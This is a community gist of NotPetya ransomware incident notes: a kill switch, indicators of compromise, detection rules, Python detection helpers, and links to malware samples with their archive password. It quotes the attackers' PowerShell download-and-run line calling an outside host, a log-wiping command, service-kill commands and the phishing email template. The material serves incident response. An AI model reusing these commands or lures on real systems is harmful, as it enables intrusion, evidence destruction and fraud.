@ecrist
Forked from vulnersCom/Petya_ransomware.md
Created June 28, 2017 14:59
#petya #petrWrap
Win32/Diskcoder.Petya.C
Ransomware attack.
Got new info? Email at isox@vulners.com
*********** KILLSWITCH // PARTIAL? GOT PROOF - EMAIL!
It looks like blocking C:\Windows\perfc.dat from being written/executed stops #Petya; the file is the DLL that gets loaded through rundll32.
https://twitter.com/HackingDave/status/879779361364357121
Local kill switch: create the file "C:\Windows\perfc".
This kills the WMI vector. You still need to patch MS17-010 for full protection.
Amit Serper (amit@cybereason.com)
https://twitter.com/0xAmit/status/879764284020064256
Positive Technologies
https://twitter.com/ptsecurity/status/879766638731591680
*********** Group Policy Preferences to deploy the NotPetya vaccine
https://eddwatton.wordpress.com/2017/06/27/use-group-policy-preferences-to-deploy-the-notpetya-vaccine/
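The kill switch above as a script, added here as an example; it is not code from the gist or from any of the researchers cited. It creates empty, read-only `perfc` and `perfc.dat` in the Windows directory and verifies they are in place. The directory is a parameter (an assumption, so the routine can be tried in a scratch directory); on a real host it is `%SystemRoot%`, normally C:\Windows, and the GPP deployment linked above is the way to push it fleet-wide.

```python
import os
import stat
from pathlib import Path

# Files the page reports as the local kill switch: the dropper checks for
# C:\Windows\perfc (Amit Serper) and writes its DLL as C:\Windows\perfc.dat.
VACCINE_NAMES = ("perfc", "perfc.dat")
WRITE_BITS = stat.S_IWUSR | stat.S_IWGRP | stat.S_IWOTH


def create_vaccine(windows_dir):
    """Create empty, read-only vaccine files in windows_dir.

    windows_dir is a parameter (assumption) so the routine can be exercised
    in a temporary directory; on a real host pass the Windows directory.
    Returns the list of paths that are present and read-only afterwards.
    """
    root = Path(windows_dir)
    done = []
    for name in VACCINE_NAMES:
        p = root / name
        if p.is_dir():
            # A directory of that name is not the file the dropper looks for.
            raise RuntimeError(f"{p} is a directory, not a file")
        if not p.exists():
            p.touch()
        # Clear the write bits; on Windows this sets the read-only attribute,
        # so the dropper cannot overwrite the file with its own DLL.
        mode = stat.S_IMODE(p.stat().st_mode)
        os.chmod(p, mode & ~WRITE_BITS)
        done.append(p)
    return done


def is_vaccinated(windows_dir):
    """True when every vaccine file exists and has no write bit set."""
    root = Path(windows_dir)
    for name in VACCINE_NAMES:
        p = root / name
        if not p.is_file():
            return False
        if stat.S_IMODE(p.stat().st_mode) & WRITE_BITS:
            return False
    return True


if __name__ == "__main__":
    # %SystemRoot% is the Windows directory; the fallback is the usual default.
    target = os.environ.get("SystemRoot", r"C:\Windows")
    for path in create_vaccine(target):
        print("vaccinated:", path)
    print("vaccinated:", is_vaccinated(target))
```

Run it elevated: writing to C:\Windows needs administrator rights, and the same script is safe to re-run because existing files are only re-marked read-only.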
*********** Ransom
Infected with #Petya? DON'T PAY THE RANSOM; you won't get your files back. The email address used by the criminals has been suspended.
https://posteo.de/blog/info-zur-ransomware-petrwrappetya-betroffenes-postfach-bereits-seit-mittag-gesperrt
*********** Bitcoin wallet monitoring
https://blockchain.info/address/1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX
*********** Samples:
https://yadi.sk/d/QT0l_AYg3KXCqc
https://yadi.sk/d/S0-ZhPY53KWc84
https://yadi.sk/d/Zpkm88sp3KWc8v
https://yadi.sk/d/WemMDKVy3KXPcy
Archive password: virus
Thanks to https://twitter.com/OxFemale for the initial malware body.
*********** Source code:
Archive password: virus
-- svchost.exe:
https://yadi.sk/d/TsNv7OGW3KXvmS // Thanks to the @Sn0wFX_
-- 027cc450ef5f8c5f653329641ec1fed9.exe in pseudocode:
https://transfer.sh/m9JMB/027cc450ef5f8c5f653329641ec1fed9.txt
-- RTF payload data:
https://transfer.sh/mCshn/data.txt
*********** Initial vector:
Ukrainian «M.E.Doc» software
http://blog.antiphish.ru/all/petya-iiv/
Additionally, on the initial attack vector:
https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html
Here is the patch that mitigates the attack vector, CVE-2017-0199:
https://support.microsoft.com/en-us/help/3178703/description-of-the-security-update-for-office-2016-april-11-2017
*********** Ransomware includes:
Modified EternalBlue exploit
A vulnerability in a third-party Ukrainian software product
A second SMB network exploit
*********** Origin (NO PROOF):
Petya was known as RaaS (Ransomware-as-a-Service) sold on Tor hidden services. This looks like a WannaCry copycat. Attribution will be hard.
https://twitter.com/x0rz/status/879733138792099842
*********** Vulnerabilities/Vectors/Actions:
MS17-010: https://vulners.com/search?query=ms17-010%20order:published
PSEXEC: %PROGRAMDATA%\dllhost.dat is dropped; it is a legitimate PsExec binary
Remote WMI, “process call create \"C:\\Windows\\System32\\rundll32.exe \\\"C:\\Windows\\perfc.dat\\\" #1”
Log cleaning: "wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D %c:"
Creates a scheduled task that reboots the machine 1 hour after infection. If the task is removed before the hour, it is not rescheduled, which can buy time.
Petya also attempts to kill Exchange & MySQL if they are running. If you host either of these services and notice them die, this is included in its infection process (svchost.exe) // by Mike "Bones" Flowers:
Exec: C:\\windows\\system32\\cmd.exe
Params: /c taskkill.exe /f /im Microsoft.Exchange.*
Exec: C:\\windows\\system32\\cmd.exe
Params: /c taskkill.exe /f /im MSExchange*
Exec: C:\\windows\\system32\\cmd.exe
Params: /c taskkill.exe /f /im sqlserver.exe
Exec: C:\\windows\\system32\\cmd.exe
Params: /c taskkill.exe /f /im sqlwriter.exe
Exec: C:\\windows\\system32\\cmd.exe
Params: /c taskkill.exe /f /im mysqld.exe
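The host-side behaviours listed above (rundll32 loading perfc.dat with the `#1` ordinal, the wevtutil/fsutil log wipe, the taskkill of Exchange/SQL/MySQL, and the dropped PsExec copy named dllhost.dat) as detection logic over process-creation events, added here as an example and not code from the gist or the cited researchers. The events are constructed Sysmon-style records, not real telemetry; the scheduled-reboot rule is an assumption, because the page reports the task but not its command line.

```python
import re

# Constructed Sysmon-style process-creation events (not real telemetry). The
# command lines follow the ones reported on this page; the last event is a
# benign rundll32 invocation used as a negative control.
SAMPLE_EVENTS = [
    {"host": "ws01", "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r'C:\Windows\System32\rundll32.exe "C:\Windows\perfc.dat" #1'},
    {"host": "ws01", "Image": r"C:\windows\system32\cmd.exe",
     "CommandLine": r"/c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security "
                    r"& wevtutil cl Application & fsutil usn deletejournal /D C:"},
    {"host": "ex01", "Image": r"C:\windows\system32\cmd.exe",
     "CommandLine": r"/c taskkill.exe /f /im MSExchange*"},
    {"host": "ws02", "Image": r"C:\ProgramData\dllhost.dat",
     "CommandLine": r"C:\ProgramData\dllhost.dat"},
    {"host": "ws03", "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"C:\Windows\System32\rundll32.exe shell32.dll,Control_RunDLL"},
]

# Each rule: (id, regex over the command line, regex over the image path).
# A rule fires when both patterns match; an empty pattern always matches.
RULES = [
    # rundll32 "C:\Windows\perfc.dat" #1 : the WMI / PsExec lateral-movement command
    ("rundll32_perfc", r"perfc\.dat.*#1", r"\\rundll32\.exe$"),
    # wevtutil cl <log> and fsutil usn deletejournal : anti-forensics
    ("log_wipe", r"wevtutil(\.exe)?\s+cl\b|fsutil(\.exe)?\s+usn\s+deletejournal", r""),
    # taskkill /f /im against the Exchange / SQL / MySQL images on the page
    ("service_kill",
     r"taskkill(\.exe)?\s+/f\s+/im\s+"
     r"(Microsoft\.Exchange\.\*|MSExchange\*|sqlserver\.exe|sqlwriter\.exe|mysqld\.exe)", r""),
    # PsExec dropped as %PROGRAMDATA%\dllhost.dat : any execution of it is suspect
    ("psexec_dllhost", r"", r"\\programdata\\dllhost\.dat$"),
    # Assumption: the reboot task is created with schtasks and runs shutdown.
    ("reboot_task", r"schtasks.*\bshutdown\b", r""),
]
COMPILED = [(rule_id, re.compile(cl_pat, re.I), re.compile(img_pat, re.I))
            for rule_id, cl_pat, img_pat in RULES]


def match_event(event):
    """Return the ids of the rules that fire on one process-creation event."""
    image = event.get("Image", "")
    cmdline = event.get("CommandLine", "")
    return [rule_id for rule_id, cl_re, img_re in COMPILED
            if cl_re.search(cmdline) and img_re.search(image)]


def triage(events):
    """Group firing rule ids by host; hosts with no hits are omitted."""
    hits = {}
    for ev in events:
        for rule_id in match_event(ev):
            hits.setdefault(ev["host"], []).append(rule_id)
    return hits


if __name__ == "__main__":
    for host, rule_ids in triage(SAMPLE_EVENTS).items():
        print(host, "->", ", ".join(rule_ids))
```

A host that trips `rundll32_perfc` or `log_wipe` is already executing the payload; the page's note about the reboot task means isolating it and deleting the task before the hour is up is worth more than any of the other rules.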
*********** Test local account behavior [NOT TESTED]:
Don't know if you have also noticed, but it only encrypted the MFT records for my test user account profile folders; the default Windows accounts (Administrator, Default User, etc.) were all untouched. My test account was local, so I don't know what behaviour would be expected for domain account profile folders.
100% on the sample used by me and on a standalone computer: user files were encrypted prior to reboot, and the malware was not able to escalate privileges to deploy the MFT encryption payload; no instructions were deposited about recovering these files.
http://imgur.com/a/FhaZx
*********** Possible IP addresses:
185.165.29.78
84.200.16.242
111.90.139.247
95.141.115.108
*********** Email:
wowsmith123456@posteo.net
iva76y3pr@outlook.com // by WhiteWolfCyber
carmellar4hegp@outlook.com // by WhiteWolfCyber
amanda44i8sq@outlook.com // by WhiteWolfCyber
gabrielai59bjg@outlook.com
christagcimrl@outlook.com
amparoy982wa@outlook.com
rachael052bx@outlook.com
sybilm0gdwc@outlook.com
christian.malcharzik@gmail.com
*********** Email form and attachment:
The subject is formed like this (for a target "target.emailName@targetDomain.com"):
target.emailName
The body:
Hello target.emailName,
You will be billed $ 2,273.42 on your Visa card momentarily.
Go through attachment to avoid it.
Password is 6089
With appreciation!
Prince
Attached file name:
Scan_target.emailName.doc
*********** Malware dropped file [REPORTED AS WRONG]:
http://185.165.29.78/~alex/svchost.exe
*********** Droppers sent via email by WhiteWolfCyber:
9B853B8FE232B8DED38355513CFD4F30
CBB9927813FA027AC12D7388720D4771
22053C34DCD54A5E3C2C9344AB47349A702B8CFDB5796F876AEE1B075A670926
1FE78C7159DBCB3F59FF8D410BD9191868DEA1B01EE3ECCD82BCC34A416895B5
EEF090314FBEC77B20E2470A8318FC288B2DE19A23D069FE049F0D519D901B95
*********** Analysis:
https://virustotal.com/fr/file/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745/analysis/
https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100
https://www.hybrid-analysis.com/sample/fe2e5d0543b4c8769e401ec216d78a5a3547dfd426fd47e097df04a5f7d6d206?environmentId=100
https://www.hybrid-analysis.com/sample/ee29b9c01318a1e23836b949942db14d4811246fdae2f41df9f0dcd922c63bc6?environmentId=100
https://twitter.com/PolarToffee/status/879709615675641856
*********** Hashes by codexgigas team:
For 185.165.29.78, we have:
a809a63bc5e31670ff117d838522dec433f74bee
bec678164cedea578a7aff4589018fa41551c27f
d5bf3f100e7dbcc434d7c58ebf64052329a60fc2
aba7aa41057c8a6b184ba5776c20f7e8fc97c657
0ff07caedad54c9b65e5873ac2d81b3126754aac
51eafbb626103765d3aedfd098b94d0e77de1196
078de2dc59ce59f503c63bd61f1ef8353dc7cf5f
As droppers
And for 84.200.16.242:
7ca37b86f4acc702f108449c391dd2485b5ca18c
2bc182f04b935c7e358ed9c9e6df09ae6af47168
1b83c00143a1bb2bf16b46c01f36d53fb66f82b5
82920a2ad0138a2a8efc744ae5849c6dde6b435d
*********** Targeted extensions by @GasGeverij
.3ds .7z .accdb .ai .asp .aspx .avhd .back .bak .c .cfg .conf .cpp .cs .ctl .dbf .disk .djvu .doc .docx .dwg .eml .fdb .gz .h .hdd .kdbx .mail .mdb .msg .nrg .ora .ost .ova .ovf .pdf .php .pmf .ppt .pptx .pst .pvi .py .pyc .rar .rtf .sln .sql .tar .vbox .vbs .vcb .vdi .vfd .vmc .vmdk .vmsd .vmx .vsdx .vsv .work .xls .xlsx .xvd .zip
*********** Potential IOCs (no proof!) from Ukrainian researchers, received on the morning of the 27th
- - - - - - - - - - - - - - - - - - - - - - - -
File Name Order-20062017.doc (RTF with CVE-2017-0199)
MD5 Hash Identifier 415FE69BF32634CA98FA07633F4118E1
SHA-1 Hash Identifier 101CC1CB56C407D5B9149F2C3B8523350D23BA84
SHA-256 Hash Identifier FE2E5D0543B4C8769E401EC216D78A5A3547DFD426FD47E097DF04A5F7D6D206
File Size 6215 bytes
File Type Rich Text Format data
Connects to the host:
84.200.16.242 80
h11p://84.200.16.242/myguy.xls
File Name myguy.xls
MD5 Hash Identifier 0487382A4DAF8EB9660F1C67E30F8B25
SHA-1 Hash Identifier 736752744122A0B5EE4B95DDAD634DD225DC0F73
SHA-256 Hash Identifier EE29B9C01318A1E23836B949942DB14D4811246FDAE2F41DF9F0DCD922C63BC6
File Size 13893 bytes
File Type Zip archive data
mshta.exe %WINDIR%\System32\mshta.exe" "C:\myguy.xls.hta" " (PID: 2324)
powershell.exe -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('h11p://french-cooking.com/myguy.exe', '%APPDATA%\10807.exe');" (PID: 2588, Additional Context: ( System.Net.WebClient).DownloadFile('h11p://french-cooking.com/myguy.exe', '%APPDATA%\10807.exe') ;)
10807.exe %APPDATA%\10807.exe" " (PID: 3096)
File Name BCA9D6.exe
MD5 Hash Identifier A1D5895F85751DFE67D19CCCB51B051A
SHA-1 Hash Identifier 9288FB8E96D419586FC8C595DD95353D48E8A060
SHA-256 Hash Identifier 17DACEDB6F0379A65160D73C0AE3AA1F03465AE75CB6AE754C7DCB3017AF1FBD
File Size 275968 bytes
!!!! Unconfirmed
Connects to the host:
111.90.139.247 80
COFFEINOFFICE.XYZ 80
Pay attention: the trojan for which I give these markers could potentially be used to load the encryption part.
*********** IOC by Informzachita (infosec.ru)
category,type,value,comment,to_ids,date
Payload delivery,md5,"71b6a493388e7d0b40c83ce903bc6b04","",1,20170627
Payload delivery,sha256,"027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745","",1,20170627
Payload delivery,sha256,"64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1","https://otx.alienvault.com/pulse/59525e7a95270e240c055ead/",1,20170627
Payload delivery,sha1,"34f917aaba5684fbe56d3c57d48ef2a1aa7cf06d","",1,20170627
Payload delivery,malware-sample,"027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745.bin|71b6a493388e7d0b40c83ce903bc6b04","Petya sample",1,20170627
Payload delivery,filename|sha1,"027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745.bin|34f917aaba5684fbe56d3c57d48ef2a1aa7cf06d","Petya sample",1,20170627
Payload delivery,filename|sha256,"027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745.bin|027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745","Petya sample",1,20170627
Payload delivery,filename|md5,"Order-20062017.doc|415fe69bf32634ca98fa07633f4118e1","delivery",0,20170627
Payload delivery,filename|sha1,"Order-20062017.doc|101cc1cb56c407d5b9149f2c3b8523350d23ba84","delivery",1,20170627
Payload delivery,filename|sha256,"Order-20062017.doc|fe2e5d0543b4c8769e401ec216d78a5a3547dfd426fd47e097df04a5f7d6d206","delivery",1,20170627
Payload delivery,vulnerability,"CVE-2017-0199","Order-20062017.doc",0,20170627
Payload delivery,filename|md5,"myguy.xls|0487382a4daf8eb9660f1c67e30f8b25","",1,20170627
Payload delivery,filename|sha256,"myguy.xls|ee29b9c01318a1e23836b949942db14d4811246fdae2f41df9f0dcd922c63bc6","",1,20170627
Payload delivery,sha1,"a809a63bc5e31670ff117d838522dec433f74bee","droppers",1,20170627
Payload delivery,sha1,"d5bf3f100e7dbcc434d7c58ebf64052329a60fc2","droppers",1,20170627
Payload delivery,sha1,"aba7aa41057c8a6b184ba5776c20f7e8fc97c657","droppers",1,20170627
Payload delivery,sha1,"bec678164cedea578a7aff4589018fa41551c27f","droppers",1,20170627
Payload delivery,sha1,"078de2dc59ce59f503c63bd61f1ef8353dc7cf5f","droppers",1,20170627
Payload delivery,sha1,"0ff07caedad54c9b65e5873ac2d81b3126754aac","droppers",1,20170627
Payload delivery,sha1,"51eafbb626103765d3aedfd098b94d0e77de1196","droppers",1,20170627
Payload delivery,sha1,"82920a2ad0138a2a8efc744ae5849c6dde6b435d","droppers",1,20170627
Payload delivery,sha1,"1b83c00143a1bb2bf16b46c01f36d53fb66f82b5","droppers",1,20170627
Payload delivery,sha1,"7ca37b86f4acc702f108449c391dd2485b5ca18c","droppers",1,20170627
Payload delivery,sha1,"2bc182f04b935c7e358ed9c9e6df09ae6af47168","droppers",1,20170627
Payload delivery,filename|md5,"BCA9D6.exe|a1d5895f85751dfe67d19cccb51b051a","",1,20170627
Payload delivery,filename|sha1,"BCA9D6.EXE|9288fb8e96d419586fc8c595dd95353d48e8a060","",1,20170627
Payload delivery,filename|sha256,"BCA9D6.exe|17dacedb6f0379a65160d73c0ae3aa1f03465ae75cb6ae754c7dcb3017af1fbd","",1,20170627
Payload installation,filename|sha1,"myguy.xls|736752744122a0b5ee4b95ddad634dd225dc0f73","",1,20170627
Payload delivery,filename,"dllhost.dat","",1,20170627
External analysis,filename|sha1,"myguy.exe|9288fb8e96d419586fc8c595dd95353d48e8a060","",1,20170627
External analysis,filename|sha256,"myguy.exe|17dacedb6f0379a65160d73c0ae3aa1f03465ae75cb6ae754c7dcb3017af1fbd","",1,20170627
External analysis,malware-sample,"myguy.exe|a1d5895f85751dfe67d19cccb51b051a","",1,20170627
External analysis,malware-sample,"svchost.exe|d2ec63b63e88ece47fbaab1ca22da1ef","possible sample",1,20170627
External analysis,filename|sha256,"svchost.exe|e5c643f1d8ecc0fd739d0bbe4a1c6c7de2601d86ab0fff74fd89c40908654be5","possible sample",1,20170627
External analysis,filename|sha1,"svchost.exe|dd52fcc042a44a2af9e43c15a8e520b54128cdc8","possible sample",1,20170627
Network activity,url,"http://185.165.29.78/~alex/svchost.exe","",1,20170627
Network activity,url,"http://84.200.16.242/myguy.xls","",1,20170627
Network activity,ip-dst|port,"84.200.16.242|80","Order-20062017.doc",1,20170627
Network activity,email-dst,"wowsmith123456@posteo.net","",1,20170627
Network activity,url,"http://french-cooking.com/myguy.exe","",1,20170627
Network activity,ip-dst|port,"111.90.139.247|80","",1,20170627
Network activity,domain,"coffeinoffice.xyz","",1,20170627
Network activity,ip-dst,"95.141.115.108","https://twitter.com/JC_DiazGarcia/status/879719578171060228",1,20170627
Network activity,ip-dst,"84.200.16.242","https://twitter.com/JC_DiazGarcia/status/879719578171060228",1,20170627
Network activity,ip-dst,"111.90.139.247","https://twitter.com/JC_DiazGarcia/status/879719578171060228",1,20170627
Network activity,ip-dst,"185.165.29.78","https://twitter.com/JC_DiazGarcia/status/879719578171060228",1,20170627
Artifacts dropped,filename,"%WINDIR%\perfc.dat","",1,20170627
Artifacts dropped,filename,"C:\myguy.xls.hta","",1,20170627
Artifacts dropped,filename,"%APPDATA%\10807.exe","",1,20170627
Financial fraud,btc,"1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX","",0,20170627
External analysis,vulnerability,"CVE-2017-0144","",0,20170627
External analysis,comment,"attack-vector:phishing","",0,20170627
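The MISP-style CSV above is the most directly reusable block on the page, so here is a loader and matcher for it, added as an example and not code from Informzachita or the gist. It splits the composite MISP types (`filename|sha256`, `ip-dst|port`) into their parts, honours the `to_ids` flag (rows such as the BTC wallet, the CVE and the `to_ids=0` MD5 are context, not detection content), and matches constructed events against the result. The embedded CSV is an excerpt of the rows on the page; the event dicts and their key names are assumptions.

```python
import csv
import io

# Excerpt of the Informzachita MISP CSV export from this page
# (category,type,value,comment,to_ids,date), embedded so the example runs offline.
IOC_CSV = """\
category,type,value,comment,to_ids,date
Payload delivery,md5,"71b6a493388e7d0b40c83ce903bc6b04","",1,20170627
Payload delivery,filename|md5,"Order-20062017.doc|415fe69bf32634ca98fa07633f4118e1","delivery",0,20170627
Payload delivery,filename|sha256,"Order-20062017.doc|fe2e5d0543b4c8769e401ec216d78a5a3547dfd426fd47e097df04a5f7d6d206","delivery",1,20170627
Payload delivery,sha1,"a809a63bc5e31670ff117d838522dec433f74bee","droppers",1,20170627
Payload delivery,filename,"dllhost.dat","",1,20170627
Network activity,url,"http://185.165.29.78/~alex/svchost.exe","",1,20170627
Network activity,ip-dst|port,"84.200.16.242|80","Order-20062017.doc",1,20170627
Network activity,email-dst,"wowsmith123456@posteo.net","",1,20170627
Network activity,domain,"coffeinoffice.xyz","",1,20170627
Artifacts dropped,filename,"%WINDIR%\\perfc.dat","",1,20170627
Financial fraud,btc,"1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX","",0,20170627
External analysis,vulnerability,"CVE-2017-0144","",0,20170627
"""

HASH_TYPES = {"md5", "sha1", "sha256"}


def _basename(path):
    """Strip any directory part, Windows or POSIX style, and lower-case."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def load_iocs(text, detection_only=True):
    """Parse the CSV into {kind: set(values)}.

    Composite MISP types ('filename|sha256', 'ip-dst|port') are split into
    their parts; all hash types are folded into one 'hash' set; the port
    half of 'ip-dst|port' is dropped. With detection_only, rows whose
    to_ids flag is not 1 are skipped, as a MISP export to an IDS would do.
    """
    index = {}
    for row in csv.DictReader(io.StringIO(text)):
        if detection_only and row["to_ids"] != "1":
            continue
        kinds = row["type"].split("|")
        values = row["value"].split("|", len(kinds) - 1)
        for kind, value in zip(kinds, values):
            if kind in HASH_TYPES:
                kind, value = "hash", value.lower()
            elif kind == "port":
                continue
            elif kind == "filename":
                value = _basename(value)   # "%WINDIR%\perfc.dat" -> "perfc.dat"
            else:
                value = value.lower()
            index.setdefault(kind, set()).add(value)
    return index


# Event field name -> IOC kind it is compared against (field names are assumptions).
EVENT_FIELDS = (("hash", "hash"), ("filename", "filename"), ("url", "url"),
                ("domain", "domain"), ("ip", "ip-dst"), ("email", "email-dst"))


def match_event(index, event):
    """Return the IOC kinds that an event (dict of optional fields) matches."""
    hits = []
    for field, kind in EVENT_FIELDS:
        value = event.get(field)
        if value is None:
            continue
        value = _basename(value) if kind == "filename" else value.lower()
        if value in index.get(kind, ()):
            hits.append(kind)
    return hits


if __name__ == "__main__":
    iocs = load_iocs(IOC_CSV)
    sample = {"filename": r"C:\Windows\perfc.dat", "ip": "84.200.16.242"}  # constructed
    print(match_event(iocs, sample))
```

Matching on the file basename is deliberate: the page lists the dropped DLL as `%WINDIR%\perfc.dat`, while endpoint telemetry reports the expanded path.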
*********** SNORT rules for the detection by Positive Technologies (ptsecurity.com):
alert tcp any any -> $HOME_NET 445 (msg: "[PT Open] Unimplemented Trans2 Sub-Command code. Possible ETERNALBLUE (WannaCry, Petya) tool"; flow: to_server, established; content: "|FF|SMB2|00 00 00 00|"; depth: 9; offset: 4; byte_test: 2, >, 0x0008, 52, relative, little; pcre: "/\xFFSMB2\x00\x00\x00\x00.{52}(?:\x04|\x09|\x0A|\x0B|\x0C|\x0E|\x11)\x00/"; flowbits: set, SMB.Trans2.SubCommand.Unimplemented; reference: url, msdn.microsoft.com/en-us/library/ee441654.aspx; classtype: attempted-admin; sid: 10001254; rev: 2;)
alert tcp any any -> $HOME_NET 445 (msg: "[PT Open] ETERNALBLUE (WannaCry, Petya) SMB MS Windows RCE"; flow: to_server, established; content: "|FF|SMB3|00 00 00 00|"; depth: 9; offset: 4; flowbits: isset, SMB.Trans2.SubCommand.Unimplemented.Code0E; threshold: type limit, track by_src, seconds 60, count 1; reference: cve, 2017-0144; classtype: attempted-admin; sid: 10001255; rev: 3;)
alert tcp any any -> $HOME_NET 445 (msg: "[PT Open] Trans2 Sub-Command 0x0E. Likely ETERNALBLUE (WannaCry, Petya) tool"; flow: to_server, established; content: "|FF|SMB2|00 00 00 00|"; depth: 9; offset: 4; content: "|0E 00|"; distance: 52; within: 2; flowbits: set, SMB.Trans2.SubCommand.Unimplemented.Code0E; reference: url, msdn.microsoft.com/en-us/library/ee441654.aspx; classtype: attempted-admin; sid: 10001256; rev: 2;)
alert tcp any any -> $HOME_NET 445 (msg: "[PT Open] Petya ransomware perfc.dat component"; flow: to_server, established, no_stream; content: "|fe 53 4d 42|"; offset: 4; depth: 4; content: "|05 00|"; offset: 16; depth: 2; byte_jump: 2, 112, little, from_beginning, post_offset 4; content: "|70 00 65 00 72 00 66 00 63 00 2e 00 64 00 61 00 74 00|"; distance:0; classtype:suspicious-filename-detect; sid: 10001443; rev: 1;)
alert tcp any any -> $HOME_NET 445 (msg:"[PT Open] SMB2 Create PSEXESVC.EXE"; flow:to_server, established, no_stream; content: "|fe 53 4d 42|"; offset: 4; depth: 4; content: "|05 00|"; offset: 16; depth: 2; byte_jump: 2, 112, little, from_beginning, post_offset 4; content:"|50 00 53 00 45 00 58 00 45 00 53 00 56 00 43 00 2e 00 45 00 58 00 45|"; distance:0; classtype:suspicious-filename-detect; sid: 10001444; rev:1;)
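The two SMB2 CREATE rules above rely on a fixed layout: the `\xfeSMB` magic at offset 4 (after the 4-byte NetBIOS session header), the Command field at offset 16, and the CREATE request's NameOffset at offset 112 (4 + 64-byte header + 44 bytes into the body), which is relative to the SMB2 header and hence needs `post_offset 4`. The following is that logic in Python, added as an example and not code from Positive Technologies or the gist; it builds a minimal constructed CREATE request so it runs offline. Unlike the Snort rule for PSEXESVC.EXE, which is case-sensitive, this compares the basename case-insensitively.

```python
import struct

SMB2_MAGIC = b"\xfeSMB"
SMB2_CREATE = 0x0005
# File names the Positive Technologies rules key on, with their alert messages.
WATCHED = {
    "perfc.dat": "Petya ransomware perfc.dat component",
    "psexesvc.exe": "SMB2 Create PSEXESVC.EXE",
}


def build_smb2_create(path):
    """Build a minimal SMB2 CREATE request: NetBIOS session header + 64-byte
    SMB2 header + 56-byte CREATE body + UTF-16LE name. Constructed test
    input; field values other than command, offsets and lengths are arbitrary."""
    name = path.encode("utf-16-le")
    header = SMB2_MAGIC + struct.pack(
        "<HHIHHIIQIIQ",
        64,           # StructureSize
        0,            # CreditCharge
        0,            # Status
        SMB2_CREATE,  # Command
        1,            # CreditRequest
        0,            # Flags
        0,            # NextCommand
        1,            # MessageId
        0,            # Reserved
        1,            # TreeId
        0x1234,       # SessionId
    ) + b"\x00" * 16  # Signature
    body = struct.pack(
        "<HBBIQQIIIIIHHII",
        57,           # StructureSize (56 fixed bytes + 1 byte of buffer)
        0, 0,         # SecurityFlags, RequestedOplockLevel
        2,            # ImpersonationLevel
        0, 0,         # SmbCreateFlags, Reserved
        0x80,         # DesiredAccess
        0,            # FileAttributes
        7,            # ShareAccess
        1,            # CreateDisposition
        0x40,         # CreateOptions
        64 + 56,      # NameOffset, relative to the start of the SMB2 header
        len(name),    # NameLength
        0, 0,         # CreateContextsOffset, CreateContextsLength
    )
    payload = header + body + name
    # NetBIOS session header: type 0 followed by a 24-bit big-endian length.
    return struct.pack(">I", len(payload)) + payload


def smb2_create_name(pkt):
    """Return the file name of an SMB2 CREATE request, else None.

    Offsets mirror the Snort rules: magic at 4, Command at 16,
    NameOffset/NameLength at 112, and the name at NameOffset + 4.
    """
    if len(pkt) < 116 or pkt[4:8] != SMB2_MAGIC:
        return None
    (command,) = struct.unpack_from("<H", pkt, 16)
    if command != SMB2_CREATE:
        return None
    name_off, name_len = struct.unpack_from("<HH", pkt, 112)
    start, end = 4 + name_off, 4 + name_off + name_len
    if name_len == 0 or name_len % 2 or end > len(pkt):
        return None
    return pkt[start:end].decode("utf-16-le", errors="replace")


def inspect(pkt):
    """Alert message when a watched file name is created over SMB2, else None."""
    name = smb2_create_name(pkt)
    if name is None:
        return None
    base = name.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return WATCHED.get(base)


if __name__ == "__main__":
    for path in ("perfc.dat", "Windows\\perfc.dat", "PSEXESVC.EXE", "report.docx"):
        print(path, "->", inspect(build_smb2_create(path)))
```

The name in a CREATE is relative to the share, so a write through ADMIN$ carries `perfc.dat` while the same file through C$ carries `Windows\perfc.dat`; comparing the basename covers both, which is also why the Snort rules use `distance:0` rather than an anchored match.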
*********** Sagan log analysis rules for the detection by Quadrant Information Security (quadrantsec.com) - Note: These are NOT Snort/Suricata rules! See http://sagan.io for more details:
alert any $EXTERNAL_NET any -> $HOME_NET any (msg: "[WINDOWS-MALWARE] Petya payload delivery SHA256 hash detected - Open source"; meta_content: "%sagan%",64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1,027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745,027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745,64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1,027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745,fe2e5d0543b4c8769e401ec216d78a5a3547dfd426fd47e097df04a5f7d6d206,ee29b9c01318a1e23836b949942db14d4811246fdae2f41df9f0dcd922c63bc6,17dacedb6f0379a65160d73c0ae3aa1f03465ae75cb6ae754c7dcb3017af1fbd,17dacedb6f0379a65160d73c0ae3aa1f03465ae75cb6ae754c7dcb3017af1fbd,e5c643f1d8ecc0fd739d0bbe4a1c6c7de2601d86ab0fff74fd89c40908654be5; meta_nocase; classtype: trojan-activity; reference: url,gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759; reference: url,isc.sans.edu/forums/diary/Widescale+Petya+variant+ransomware+attack+noted/22560/; sid:5003121; rev:1;)
